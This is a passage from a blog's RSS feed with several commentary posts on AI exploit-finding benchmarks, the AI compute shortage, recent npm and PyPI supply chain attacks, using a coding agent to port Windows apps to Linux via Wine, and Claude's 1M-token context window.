<p>Guess what? According to Anthropic, Mythos Preview successfully generates a working exploit for Firefox's JS shell in 72.4% of trials. Opus 4.6 managed this in under 1% of trials in a previous evaluation:</p>
<img src="https://martinalderson.com/img/mythos-js-sandbox-escape.png" alt="Bar chart titled 'Firefox JS shell exploitation' comparing three models across three categories: trials where the model generated a successful exploit (dark red), achieved register control but could not exploit (light orange), and did not succeed (grey). Sonnet 4.6 achieved register control in 4.4% of trials; Opus 4.6 in 14.4%; Mythos Preview produced a successful exploit in 72.4% of trials with a further 11.6% reaching register control. A footnote notes that Opus's successful exploit rate in a previous evaluation was under 1%, which is where the ~100x figure comes from." style="display: block; margin: 1.5em auto;">
<p>Worth flagging a couple of caveats. The JS shell here is Firefox's standalone SpiderMonkey - so this is escaping the <em>innermost</em> sandbox layer, not the full browser chain (the renderer process and OS app sandbox still sit on top). And it's Anthropic's own benchmark, not an independent one. But even hedging both of those, the trajectory is what matters - we're going from &quot;effectively zero&quot; to &quot;72.4% of the time&quot; in one model generation, on a real-world target rather than a toy CTF.</p>
<p>This is pretty terrifying if you understand the implications of this. If an LLM can find exploits in sandboxes - which are some of the most <em>well secured</em> pieces of software on the planet - then suddenly every website you aimlessly browse through could contain malicious code which can 'escape' the sandbox and theoretically take control of your device - and all the data on your phone could be sent to someone nasty.</p>
<p>These attacks are so dangerous <em>because</em> the internet is built around sandboxes being safe. For example, each banner ad your browser loads is loaded in a separate sandboxed environment. This means they can run a huge amount of (mostly) untested code, with everyone relying on the browser sandbox to protect them. If that sandbox falls, then suddenly a malicious ad campaign can take over millions of devices in hours.</p>
<h2>But it's not just websites</h2>
<p>Equally, sandboxes (and virtualisation) are fundamental to allowing cloud computing to operate at scale. Most servers these days are not running code against the actual <em>server</em> they are on. Instead, AWS et al take the physical hardware and &quot;slice&quot; it up into so called &quot;virtual&quot; servers, selling each slice to different customers. This allows many more applications to run on a single server - and enables some pretty nice profit margins for the companies involved.</p>
<p>This operates on roughly the same model as your phone, with various layers to protect customers from accessing each other's data and (more importantly) from accessing the control plane of AWS.</p>
<p>So, we have a very, very big problem if these sandboxes fail, and all fingers point towards this being the case this year. I should tone down the disaster porn slightly - there have been many sandbox escapes before that haven't caused chaos, but I have a strong feeling that this is going to be difficult.</p>
<p>And to be clear, when <em>just</em> AWS us-east-1 goes down (which it has done <a href="https://aws.amazon.com/message/12721/">many</a>, <a href="https://aws.amazon.com/message/073024/">many</a>, <a href="https://www.thousandeyes.com/blog/aws-outage-analysis-october-20-2025">times</a>) it is front page news globally and tends to cause significant disruption to day to day life. This is just one of AWS's data centre zones - if a malicious actor was able to take control of the AWS control plane it's likely they'd be able to take all regions simultaneously, and it would likely be infinitely harder to restore when a bad actor was in charge, as opposed to the internal problems that have caused previous problems - and been extremely difficult to restore from in a timely way.</p>
<h2>The plan</h2>
<p>Given all this it's understandable that Anthropic are being cautious about releasing this in the wild. The issue though, is that the cat is out of the bag. Even if Anthropic pulled a Miles Dyson and lowered their model code into a pit of molten lava, <em>someone</em> else is going to scale an RL model and release it. The incentives are far, far too high and the prisoner's dilemma strikes again.</p>
<p>The current status quo seems to be that these next generation models will be released to a select group of cybersecurity professionals and related organisations, so they can fix things as much as possible to give them a head start.</p>
<p>Perhaps this is the best that can be done, but this seems to me to be a repeat of the famous &quot;obscurity is not security&quot; approach which has become a meme in itself in the information security world. It also seems far fetched to me that these organisations who <em>do</em> have access are going to find even <em>most</em> of the critical problems in a limited time window.</p>
<p>And that brings me to my final point. While Anthropic are providing $100m of credit and $4m of 'direct cash donations' to open source projects, it's not <em>all</em> open source projects.</p>
<p>There are a <em>lot</em> of open source projects that everyone relies on without realising. While the obvious ones like the Linux kernel are getting this &quot;access&quot; ahead of time, there are literally <em>millions</em> of pieces of open source software (nevermind commercial software) that are essential for a substantial minority of systems operation. I'm not quite sure where the plan leaves these ones.</p>
<p>Perhaps this is just another round in the cat and mouse cycle that reaches a mostly stable equilibrium, and at worst we have some short term disruption. But if I step back and look how fast the industry has moved over the past few years - I'm not so sure.</p>
<p>And one thing I think is for certain, it looks like we <em>do</em> now have the fabled superhuman ability in at least one domain. I don't think it's the last.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Albeit at the cost of adding yet more pressure onto the compute crunch the AI industry is experiencing <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/has-mythos-just-broken-the-deal-that-kept-the-internet-safe/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/has-mythos-just-broken-the-deal-that-kept-the-internet-safe/</guid>
      <pubDate>Fri, 10 Apr 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>What next for the compute crunch?</title>
      <description>AI compute demand is growing exponentially while supply constraints bite hard. The next 18-24 months are going to be defined by shortages, rationing and price discovery.</description>
      <content:encoded><![CDATA[<p>I thought it'd be a good time to continue on the same theme as my previous two articles <a href="https://martinalderson.com/posts/the-coming-ai-compute-crunch/">The Coming AI Compute Crunch</a> and <a href="https://martinalderson.com/posts/is-the-ai-compute-crunch-here/">Is the AI Compute Crunch Here?</a> given that both OpenAI and Anthropic are now publicly agreeing they are (very?) compute starved.</p>
<h2>Usage is absolutely exploding</h2>
<p>I came across this really interesting <a href="https://x.com/kdaigle/status/2040164759836778878">tweet</a> from the COO of GitHub which really underlines the scale of change that the world is seeing now:</p>
<img src="https://martinalderson.com/img/github-commits-explosion.png" alt="GitHub COO tweet showing ~14x annualised increase in commits" style="display: block; margin: 1.5em auto; max-width: 550px; width: 100%;">
<p>This shows that GitHub <em>in the last 3 months</em> (!) has seen a ~14x annualised increase in the number of commits. Commits are a crude proxy for inference demand - but even directionally, if we assume that most of the increase is due to coding agents hitting the mainstream, it points to an outrageously large increase in compute requirements for inference.</p>
<p>If anything, this is probably a huge undercount - many people new to &quot;vibe coding&quot; are unlikely to get their heads round Git(Hub) quickly - distributed source control is quite confusing to non engineers (and, at least for me, took longer than I'd like to admit to get totally fluent with it as an engineer).</p>
<p>Plus this doesn't include all the Cowork usage which is very unlikely to go anywhere near GitHub.</p>
<p>OpenAI's Thibault Sottiaux (head of the Codex team) also <a href="https://x.com/thsottiaux/status/2040230479392395539">tweeted</a> recently that AI companies are going through a phase of demand outstripping supply:</p>
<img src="https://martinalderson.com/img/openai-demand-supply.png" alt="OpenAI's Thibault Sottiaux tweet on demand outstripping supply" style="display: block; margin: 1.5em auto; max-width: 550px; width: 100%;">
<p>It's been <a href="https://www.wsj.com/tech/ai/the-sudden-fall-of-openais-most-hyped-product-since-chatgpt-64c730c9">rumoured</a> - and indeed in my opinion highly likely given how compute intensive video generation is - that Sora was shut down to free up compute for other tasks.</p>
<p>All AI companies are feeling this <em>intensely</em>. Even worse, there is a domino effect with this - when Claude Code starts tightening usage limits or experiencing compute-related outages, people start switching to e.g. Codex or OpenCode, putting increased pressure on them.</p>
<h2>What's <em>actually</em> going on?</h2>
<p>As I mentioned in my last articles, I believe everyone was looking at these &quot;crazy&quot; compute deals that OpenAI, Anthropic, Microsoft etc were signing like they were going out of fashion back in ~2025 the <em>wrong</em> way.</p>
<p>Signing a $100bn &quot;commitment&quot; to buy a load of GPU capacity does <em>not</em> suddenly create said capacity. Concrete needs poured, power needs to be connected, natural gas turbines need to be ordered<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> and GPUs need to be fabricated, racked and networked. <em>All</em> of these products are in short supply, as is the labour required.</p>
<p>One of the key points I think worth highlighting that often gets overlooked is how difficult the rollout of GB200 (NVidia's latest chips) has been. Unlike previous generations of GPUs from NVidia the GB200-series is fully liquid cooled - not air cooled as before.</p>
<p>Liquid cooling at gigawatt scale just hasn't really been done in datacentres before. From what I've heard  it's been unbelievably painful. Liquid cooling significantly increases the power density/m<sup>2</sup>, which makes the electrical engineering required harder - plus a real shortage of skilled labour<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup> to plumb it all together - and even shortages of various high end plumbing components has led to most (all?) of the GB200 rollout being vastly behind schedule.</p>
<p>While no doubt these issues will get resolved - and the supply chains will gain experience and velocity in delivering liquid cooled parts - this has no doubt put even more pressure on what compute is available in the short to medium term.</p>
<p>Even worse, Stargate's 1GW under construction datacentre in the UAE is now a chess piece in the current geopolitical tensions in the recent US/Iran conflict, with the Iranian government putting out a <a href="https://www.theverge.com/ai-artificial-intelligence/907427/iran-openai-stargate-datacenter-uae-abu-dhabi-threat">video</a> featuring the construction site.</p>
<p>The longer term issue I wrote about in my previous articles on this subject is the hard constraints on DRAM fabrication. While SK Hynix recently <a href="https://www.reuters.com/world/asia-pacific/sk-hynix-buy-euv-scanners-8-billion-asml-korea-2026-03-24/">signed</a> a $8bn deal for more EUV production equipment from ASML, it's unlikely to come online for another couple of years. Indeed I noticed Sundar Pichai specifically called out memory as a significant constraint on his recent <a href="https://x.com/collision/status/2041203935801925822">appearance</a> on the Stripe podcast.</p>
<p>While recent innovations like <a href="https://research.google/blog/turboquant-redefining-ai-efficiency-with-extreme-compression/">TurboQuant</a> are extremely promising in driving memory requirements down via KV cache compression, given the pace at which AI usage is growing it at best buys a small window of breathing room.</p>
<h2>What next?</h2>
<p>I believe the next 18-24 months are going to be defined by compute shortages. When you have exponential demand increases and ~linear additions on the supply side, the market is going to be pretty volatile, to say the least.</p>
<p>The cracks are already showing. Anthropic's uptime is famously now at &quot;1&quot; nine reliability, and doesn't seem to be getting any better. I don't envy the pressure on SRE teams trying to scale these systems dramatically while deploying new models and efficiency strategies.</p>
<p>We've seen Anthropic introduce increasingly more heavy handed measures on the Claude subscription side - starting with &quot;peak time&quot; usage limits being cut significantly, and now moving to ban even <code>claude -p</code> usage from 3rd party agent harnesses - no doubt to try and reduce demand.</p>
<p>The issue is that if my guesswork at the start of the article is correct and Anthropic is seeing ~10x Q/Q inference demand there is only so much you can do by banning 3rd party use of the product - 1st party use will quickly eat that up.</p>
<p>And time based rationing - while extremely useful to smooth out the peaks and troughs - can only go so far. Eventually you incentivise it enough that you max out your compute 24/7.  That's not to say there isn't a lot more they can (and will) do here, but when you are facing those kind of demand increases it doesn't end up getting you to a steady state.</p>
<p>That really only leaves one lever to pull - price. I was hesitant in my previous articles to suggest major price increases, as gaining marketshare is so important to everyone involved in this trillion dollar race, but if <em>all</em> AI providers are compute starved then I think the game theory involved changes.</p>
<p>The paradox of this though is that as models get better and better - and the rumours around the new &quot;Spud&quot; and &quot;Mythos&quot; models from OpenAI and Anthropic point that way - users get <em>less</em> price sensitive. While spending $200/month when ChatGPT first brought out their Pro subscription seemed almost comically expensive for the value you could get out of it, I class my $200/month Anthropic subscription as some of the best value going and would probably pay a lot more for it if I had to, even with <em>current</em> models.</p>
<p>We're in completely uncharted territory as far as I can tell. I've been doing a lot of reading about the initial electrification of Europe and North America recently in the late 1800s/early 1900s but the analogy quickly breaks down - the demand growth is so much steeper and the supply issues were far less concentrated.</p>
<p>So, we're about to find out what people will actually pay for intelligence on tap. My guess is a lot more than most expect - which is both extremely bullish for the industry <em>and</em> going to be extremely painful for users in the short term.<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup></p>
<p>Fundamentally, I believe there is a near infinite demand for machines approaching or surpassing human cognition, even if that capability is spread unevenly across domains. The supply will catch up eventually. But it's the &quot;eventually&quot; that's going to hurt.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Increasingly large AI datacentres are skipping grid connections (too slow to come online) and connecting straight to natural gas pipelines and installing their own gas turbines and generation sets <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn2" class="footnote-item"><p>I've also read that various manufacturing problems from NVidia has lead to parts leaking, which famously does not combine well with high voltage electrical systems. <a href="#fnref2" class="footnote-backref">↩︎</a></p>
</li>
<li id="fn3" class="footnote-item"><p>One flip side of this is how much better the small models have got. I'll be writing a lot more on this, but Gemma 4 26b-a4b running locally is hugely impressive for software engineering. It's not <em>quite</em> good enough, but perhaps we are only a few months off local models on consumer hardware being &quot;good enough&quot;. Maybe it's worth buying that Mac or GPU you were thinking about as a hedge? <a href="#fnref3" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/what-next-for-the-compute-crunch/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/what-next-for-the-compute-crunch/</guid>
      <pubDate>Mon, 06 Apr 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Telnyx, LiteLLM and Axios: the supply chain crisis</title>
      <description>A cascading wave of supply chain attacks has hit npm and PyPI in under two weeks. LLMs are making it worse, and current mitigations aren&#39;t enough.</description>
      <content:encoded><![CDATA[<p>While the world's been watching physical supply chains, a different kind of supply chain attack has been escalating in the open source ecosystem.</p>
<h2>The issue</h2>
<p>Over the past week a group of bad actors have been compromising various open source projects, pushing malicious versions of libraries which inject a trojan that collects sensitive data from systems that install the malicious version.</p>
<p>Ironically, the first attack started with <code>Trivy</code>, an open source package for <em>finding</em> security vulnerabilities.</p>
<p>The scale of the issue is growing and is alarming. This wave of attacks started with some smaller libraries, then started to hit more popular packages in the supply chain with <code>Telnyx</code>, a popular package for voice and SMS integration. This had ~150k/week downloads on the affected package.</p>
<p><a href="https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html"><code>LiteLLM</code></a> was next - a much more popular package for calling various APIs. This had ~22M/week downloads.</p>
<p>Finally, and most concerning, the npm package for <code>axios</code> - an <em>incredibly</em> widely used library for calling APIs, was <a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan">attacked</a> on March 31st. This has at least 100M downloads a week and is a very core piece of software that is used in millions of apps.</p>
<p>There was a rapid reaction to each of these attacks to remove the malicious versions, but even in the hours they were up, tens of thousands of machines (and potentially far more) were likely compromised.</p>
<p>The attackers are leveraging stolen credentials from the previous attack(s) to then infect more packages in the supply chain. This creates a vicious cycle of compromises that continues to grow.</p>
<p>Equally, other systems are at risk - for every system that the attack compromises who happens to also be a developer of <em>another</em> software library, there are probably thousands of other developers who have unfortunately leaked very sensitive data to the attackers.</p>
<h2>Not a new issue</h2>
<p>This is not a new issue, and last year we saw the <code>Shai-Hulud v1</code> and <code>v2</code> attacks against the npm ecosystem which in two waves backdoored over 1,000 packages. The aim of this attack appears to have been to steal crypto - with <a href="https://www.bleepingcomputer.com/news/security/trust-wallet-links-85-million-crypto-theft-to-shai-hulud-npm-attack/">reports</a> suggesting $8.5m was stolen.</p>
<p>The infrastructure providers behind this supply chain did respond by putting various mitigations in place. The primary two were requiring published packages to use short-lived tokens - which reduces the impact of &quot;old&quot; credentials being able to publish new packages.  It appears this has not solved the issue - given it seems these packages have managed to be published regardless.</p>
<p>The more invasive one is to allow developers to not install &quot;brand new&quot; packages. Instead, they get held for a time period - say 24 hours - with the idea being the community will (hopefully) detect malicious versions in the 24 hours and revoke them before they are installed.</p>
<p>This is a double edged sword though - as often you <em>need</em> rapid response to a vulnerable package to <em>avoid</em> security issues. This can be overridden manually - but it does introduce some overhead to response to urgent security flaws.</p>
<p>Finally, npm are rolling out staged publishing. This requires a separate step when publishing new versions of packages for a &quot;trusted&quot; human to do a check on the platform with two step verification to avoid automated attacks. However, given it seems developers computers' are being compromised it is not implausible to suggest that the attacker could also perform this step.</p>
<h2>The broader picture</h2>
<p>I'm extremely concerned about the cybersecurity risk LLMs pose, which I don't think is sufficiently priced in on the impact it is going to have outside of niche parts of the tech community. While it's hard to know for sure how the initial attacks were discovered, I strongly suspect they have been aided by LLMs to find the exploit(s) in the first place and develop subsequent attacks.</p>
<p>While this is conjecture, the number of exploits being found by non-malicious actors is <em>exploding</em>. I found one myself - which I wrote up in a <a href="https://martinalderson.com/posts/anthropic-found-500-zero-days/">recent post</a>, still unpatched - in less than half an hour. There's <a href="https://www.lesswrong.com/posts/7aJwgbMEiKq5egQbd/ai-found-12-of-12-openssl-zero-days-while-curl-cancelled-its">endless</a> <a href="https://www.infoq.com/news/2026/03/claude-ai-firefox-vulnerability/">other</a> <a href="https://gbhackers.com/claude-ai-zero-day-rce-vulnerabilities-in-vim-and-emacs/">examples</a> <a href="https://thehackernews.com/2026/03/openai-codex-security-scanned-12.html">online</a>.</p>
<p>So it seems to me that LLMs are acting as an accelerant:</p>
<p>Firstly, they make finding security vulnerabilities far easier - which allows the whole supply chain attack cycle to start. And the leaked <a href="https://fortune.com/2026/03/26/anthropic-says-testing-mythos-powerful-new-ai-model-after-data-leak-reveals-its-existence-step-change-in-capabilities/">rumours</a> about the new Mythos model from Anthropic being a step change <em>better</em> than Opus 4.6 (which is already exceptionally good at finding security issues) means the direction of travel is only going one way.</p>
<p>Secondly, they allow attackers to build far more sophisticated attacks <em>far</em> quicker than before - for example, one of the attacks in this recent wave hid one exploit in an audio file.</p>
<p>Next, this is all happening while the infrastructure providers of the software supply chain are on the back foot with improving mitigations.</p>
<img src="https://martinalderson.com/img/xkcd-dependency.png" alt="xkcd 2347: Dependency - all of modern digital infrastructure resting on a project some random person in Nebraska has been thanklessly maintaining since 2003" style="max-width: 400px; display: block; margin: 1.5em auto;">
<blockquote>
<p><a href="https://xkcd.com/2347/">xkcd 2347</a></p>
</blockquote>
<p>Finally, so much of the software ecosystems' critical security infrastructure is maintained by volunteers who are often unpaid. As always, the above image illustrates the point far better than words can.</p>
<p>To reiterate - it may be that this is just a well resourced group that could have done all this without LLMs. But given adoption of coding agents is so high in the broader developer community, it seems far fetched to say they wouldn't be used for nefarious means.</p>
<p>Fundamentally, these attacks are possible because OSes (by default) are far too permissive and designed in a world where software is either trusted or not. The attempts to secure this - by trusting certain <em>publishers</em> - falls down for both agents and supply chain attacks because agents can use trusted software in unexpected ways, and if the <em>trusted</em> authors of the software are compromised it bypasses everything.</p>
<h2>We need a new(ish) OS</h2>
<p>Thinking a few steps ahead here, it seems to me that the core mitigations are (mostly) insufficient.</p>
<ul>
<li>Any delay to publishing packages can backfire and introduce delays in responding to <em>real</em> security incidents</li>
<li>There is too much software - maintained or unmaintained - which is likely to be vulnerable</li>
<li>Much of this software, if it is maintained, is poorly resourced and is likely to burn out volunteers trying to resolve a flood of security issues in the near term</li>
</ul>
<p>There are <em>some</em> things however that would help with the supply chain in particular:</p>
<ul>
<li>Frontier labs donating compute and tokens to automatically scan <em>every</em> package update for potential signs of compromise before publishing. This would be an excellent use of their leading models</li>
</ul>
<p>To me though I keep coming back to the realisation that the difficulty of <a href="https://martinalderson.com/posts/why-sandboxing-coding-agents-is-harder-than-you-think/">sandboxing agents </a>faces very similar challenges to helping mitigate the impact of this security issue.</p>
<p>iOS and Android were designed with this approach in mind - each app has very limited access to other apps and the OS as a whole. I think we need to move desktop and server operating systems to a similar model for this new world.</p>
<p>While this won't resolve all issues, it will dramatically reduce the &quot;blast impact&quot; of each attack and prevent the &quot;virality&quot; of many exploits from gathering traction.</p>
<p>The OS should know that <code>npm install</code> should only write package files to a certain set of folders and reject everything else. The OS should know a baseline of services a CI/CD run and what network calls it makes, to avoid connections to random command and control services. And like mobile OSes, one program shouldn't be able to read another programs files and data without explicit opt in.</p>
<p>If you've used sandbox mode in a coding agent, you will be familiar with this approach - all the pieces are there already. <a href="https://en.wikipedia.org/wiki/Qubes_OS">Qubes OS</a> is probably the closest thing outside of mobile OSes to what I'm thinking we need to move to - a security focused Linux operating system which runs each app in a total self-contained VM.</p>
<p>It's an enormous undertaking to migrate the world's software to run like this, and perhaps governments should be allocating significant resources to open source projects to help them adopt this.</p>
]]></content:encoded>
      <link>https://martinalderson.com/posts/telnyx-litellm-axios-supply-chain-crisis/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/telnyx-litellm-axios-supply-chain-crisis/</guid>
      <pubDate>Tue, 31 Mar 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Using agents and Wine to move off Windows</title>
      <description>How I used Claude Code to fix Linux desktop issues, get &#39;garbage&#39;-rated Windows apps working in Wine, and what it means for software ecosystems</description>
      <content:encoded><![CDATA[<p>I don't think people have fully internalised how good agents are at reverse engineering code. I had one take a Windows app rated &quot;garbage&quot; for Wine compatibility and get it working on Linux: decompiling DLLs, writing code caves, patching assembly. Equally, they're superb at the kind of sysadmin tasks that make desktop Linux painful.</p>
<p>I've been increasingly unhappy running Windows on my main workstation (I still love Apple hardware for laptops, though). While Windows Subsystem for Linux is pretty excellent, I realised all I was using Windows for was Chrome, Slack and WSL. Plus Windows definitely isn't going in the right direction for my use cases (and I'd argue many people) - with endless bloatware being added in each new release.</p>
<p>While I've got over 20 years Linux experience, I've always struggled to get desktop Linux working very well - despite first installing Red Hat 6.0 many, many years ago. I've always found issues that were painful to resolve, but I had a thought - could an agent fix these for me?</p>
<h2>First stop, Fedora</h2>
<p>While chatting with an LLM on this plan, it recommended Fedora over Ubuntu at one point. I assumed (probably like many) that Ubuntu was the most polished Linux distribution. I've certainly had no real issues with Ubuntu on the server, but I haven't really used Fedora for many years on the desktop.</p>
<p>Armed with a USB stick, I gave it a go.</p>
<p>First impressions were <em>very</em> good. Unlike Ubuntu, it managed fractional font scaling on both my monitors out of the box. All of my hardware was detected and unlike Ubuntu the default packages are nearly all up to date. This is a huge plus - given how badly Ubuntu packages lag latest versions, I have to spend far too long installing random PPAs and binary distributions of many packages. I <em>believe</em> this is beginning to improve, but it's just great to be able to <code>dnf install</code> a language or tool and have a (mostly) very recent version.</p>
<p>Flatpak also works great, and the GNOME Software app is really nice.</p>
<p>So far, so good. I'd really recommend Fedora for desktop use.</p>
<h2>Fixing problems</h2>
<p>The first major issue I hit was using my spare iPhone as a webcam. While there are some good solutions, all of the ones I found require an out-of-tree kernel module, which if you use Secure Boot becomes a real pain. This is the <em>exact</em> kind of issue where I'd waste far too much time trying to fix manually, and probably at some point give up.</p>
<p>Claude Code, however, guided me through the fairly arcane steps of using <code>mokutil</code> and <code>akmods</code> to build and sign it. Within a few minutes, webcam working!</p>
<p>The only other issue of note I had the agent fix was multiple Bluetooth devices causing issues. I had Claude Code resolve that by disabling the less important one (though not sure why this doesn't work out of the box)<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup> and it even found a way to grab my Bluetooth encryption keys from Windows so everything automatically paired.</p>
<p>In general this worked brilliantly. Even setting up various desktop tweaks (font config, Dash to Panel, etc) was really easy and efficient and saved a tonne of time Googling around to find the best options.</p>
<p>Overall this was <em>far</em> quicker than installing and setting up Windows fresh, given Windows requires far more drivers to be downloaded and installed. Linux hardware support for the most part is really excellent these days.</p>
<h2>Wine</h2>
<p>I did realise that I needed a couple more Windows apps, ideally. All but one worked very quickly with Wine, with Claude Code setting up the various <code>WINEPREFIX</code>es and installing the right DLLs.</p>
<p>However, I hit a significant snag trying to get <a href="https://airflow.app/">Airflow</a> working (it's a really nice app for streaming content to AirPlay and Chromecast devices). Nothing works quite as well as it in my opinion.</p>
<p>This app was rated <a href="https://appdb.winehq.org/objectManager.php?sClass=version&amp;iId=41181">&quot;garbage&quot;</a> for Wine compatibility. This gave me an idea though to see how far I could push Claude Code to fix it. While at first it was hesitant to try and recommended various other alternatives, I insisted it try more.</p>
<p><em>Incredibly</em> it managed to get things almost entirely working (and working enough for my needs!). This was an extremely involved (for 99.99% of humans) process.</p>
<p>The first thing it did was build a stub <code>powrprof.dll</code> to implement Windows power management APIs the app required. It used the <code>mingw</code> cross-compiler to compile a Windows DLL on Linux and load that in. I wasn't even aware you could compile Windows DLLs on Linux like that.</p>
<p>Then came a series of crashes. A socket option level that Wine's Winsock translation didn't handle, Wine's buggy C++ exception handler corrupting vtable pointers, and a Qt call returning null because Wine maps screen coordinates differently to Windows. For each one, Claude Code decompiled the relevant DLLs, worked out what the assembly was doing, and binary-patched them: writing code caves, changing conditional jumps, fixing socket constants at specific file offsets. It was <em>so</em> good at this and felt like complete magic watching it work.</p>
<p>This took quite a few rounds, but I could get on with other tasks while it worked, and the agent would let me know to test it again.</p>
<p>A couple of hours later and Airflow was working and streaming to my Chromecast(s). I believe AirPlay was also working but I didn't have a device handy to fully test it. If you're interested in more detail on this I wrote a <a href="https://gist.github.com/martinalderson/2b4185675ac5afc3daeb909ce896e15b">gist</a> of the main steps it did.</p>
<img src="https://martinalderson.com/img/airflow-wine-linux.png" alt="Airflow running in Wine on Linux" style="display: block; margin: 1.5em auto;" class="desktop-smaller">
<blockquote>
<p>Airflow streaming to Chromecast, running in Wine on Fedora</p>
</blockquote>
<h2>The implications</h2>
<p>Firstly, it'd be <em>awesome</em> for one of the inference providers (or model creators themselves) to have a go at fixing thousands of Wine apps autonomously in an agent harness. I think it'd be an awesome benchmark in itself of how good an agent/model is <em>and</em> would be a great public good.</p>
<p>But the main conclusion I came to is that a lot of the typical &quot;network effects&quot; for software ecosystems are far more fragile than before. It was once a given that these ecosystems had almost impossibly strong network effects. As agents continue to get better and better, it seems to me that reverse engineering and porting apps between platforms is just a matter of tokens.</p>
<p>Finally, I do think it's a shame to see that many open source projects are insisting on a complete ban of any LLM generated code. While I totally appreciate the flood of garbage PRs is taking far too much maintainer time up, I think highly skilled open source developers with agents would allow an enormous amount of improvement in a small space of time. Hopefully this will get more flexible with time.</p>
<p>In my opinion open source absolutely <em>shines</em> when you can have an agent work with it. It really in a way fulfils the original vision of open source - that everyone can edit and improve the app or tool in the way they see fit. Agents completely democratise that.</p>
<hr class="footnotes-sep">
<section class="footnotes">
<ol class="footnotes-list">
<li id="fn1" class="footnote-item"><p>Apparently GNOME says the Bluetooth stack doesn't support this, but the BlueZ team says it does. Confusing, and really the only hardware issue I had. <a href="#fnref1" class="footnote-backref">↩︎</a></p>
</li>
</ol>
</section>
]]></content:encoded>
      <link>https://martinalderson.com/posts/using-agents-and-wine-to-move-off-windows/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=feed</link>
      <guid isPermaLink="true">https://martinalderson.com/posts/using-agents-and-wine-to-move-off-windows/</guid>
      <pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate>
      <author>martin@martinalderson.com (Martin Alderson)</author>
    </item>
    <item>
      <title>Why Claude&#39;s new 1M context length is a big deal</title>
      <description>Anthropic&#39;s 1M token context window on Opus 4.6 and Sonnet 4.6 is a genuine breakthrough - and they&#39;re not even charging more for it.</description>
      <content:encoded><![CDATA[<p>Last Friday Anthropic released a new (production at least - has been in beta for a while) 1M context window variant of Opus 4.6 and Sonnet 4.6. This is actually a big breakthrough from my initial experiments.</p>
<p>If you struggle to visualise what a token is - a good rule of thumb I use is that a standard A4/letter-sized page tends to contain around 500-1000 tokens of English<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>. So, 1 million tokens is roughly 1,000-2,000 pages - or about 4-5 novels worth of text.</p>
<h2>AI is improving on so many dimensions</h2>
<p>I think it's important to start by underlining just how many things are improving in the AI space. Across quality, cost, speed (the new Qwen 3.5 models unlock very interesting use cases at a low cost) and now context length, the pace is relentless.</p>
<p>GPT-3.5 had a 4,096 token context window - perhaps a few pages of text - back in late 2022. That steadily increased to around 200K over the intervening couple of years. Now we have a 1M context length on a very capable frontier model (I should add that GPT-5.x also had much longer context windows, but for the most part they were limited to only the APIs).</p>
<p>But wait you might ask - didn't Gemini have this a long time ago? Yes they did, but the results were pretty poor.</p>
<h2>Not all context lengths are made equal</h2>
<p>There's a concept in LLMs called <em>context rot</em> where as the session with the model grows in length, it tends to drop in quality. It can start 'forgetting' things in its context window you've already said, or worse, confusing concepts and hallucinating more. This has been (one of the many) reasons that most practitioners in the space recommend always starting new sessions as often as possible.</p>
<p>One way to measure this degradation is the 'needle' benchmark. This asks the LLM to recall a certain fact from its context window, and repeat it back (the name comes from the phrase &quot;finding a needle in the haystack&quot;).</p>
<p>Like all benchmarks it does have weaknesses, but I thought this chart Anthropic published was very interesting:</p>
<img src="https://martinalderson.com/img/claude-1m-needle-benchmark.png" alt="Needle-in-haystack benchmark comparison showing Claude maintaining near-perfect recall at 1M tokens while GPT-5.4 and Gemini 3.1 Pro degrade past 256K" class="no-border" style="display: block; margin: 1.5em auto;">
<p>You can see here that while GPT-5.4 and Gemini 3.1 Pro both <em>have</em> 1M context lengths, they quickly degrade past 256K - struggling to get above 50% match ratio at 1M length. This is a real problem for long running agentic tasks.</p>
<p>Now we always need to take these benchmark comparisons from the labs with a pinch of salt - Anthropic has every incentive to pick benchmarks that flatter their own models, they all do. But my rough anecdotal experimentation with Opus 4.6 1M does seem to hold up. I've run a few ~500K token sessions with Claude Code after it was released, and the performance seems very good. It kept on task, and I didn't have to &quot;repeat myself&quot; any more than I'd normally do. It felt extremely natural, just like a normal (shorter context) session with Claude Code.</p>
<img src="https://martinalderson.com/img/claude-1m-context-usage.png" alt="Claude Code session showing context usage at around 500K tokens" style="display: block; margin: 1.5em auto;">
<blockquote>
<p>Halfway to a million tokens. No signs of amnesia yet.</p>
</blockquote>
<p>I'm interested to see external and third party benchmarks over the coming days to see if there are any gotchas with it, but first impressions are very positive.</p>
<h2>Why longer context windows are so helpful</h2>
<p>Now you may ask why this really matters - how often do you need to have the model remember thousands of pages of text day to day?</p>
<p>The answer is (of course) agentic workflows. If you've used coding agents for any length of time, you'll quickly reach a point where you hit the dreaded 'compaction' stage. Compaction is the process most agents use when they reach the limit of the context window. It condenses earlier parts of the conversation - preserving recent context and key artifacts but losing a lot of the detail from earlier in the session.</p>
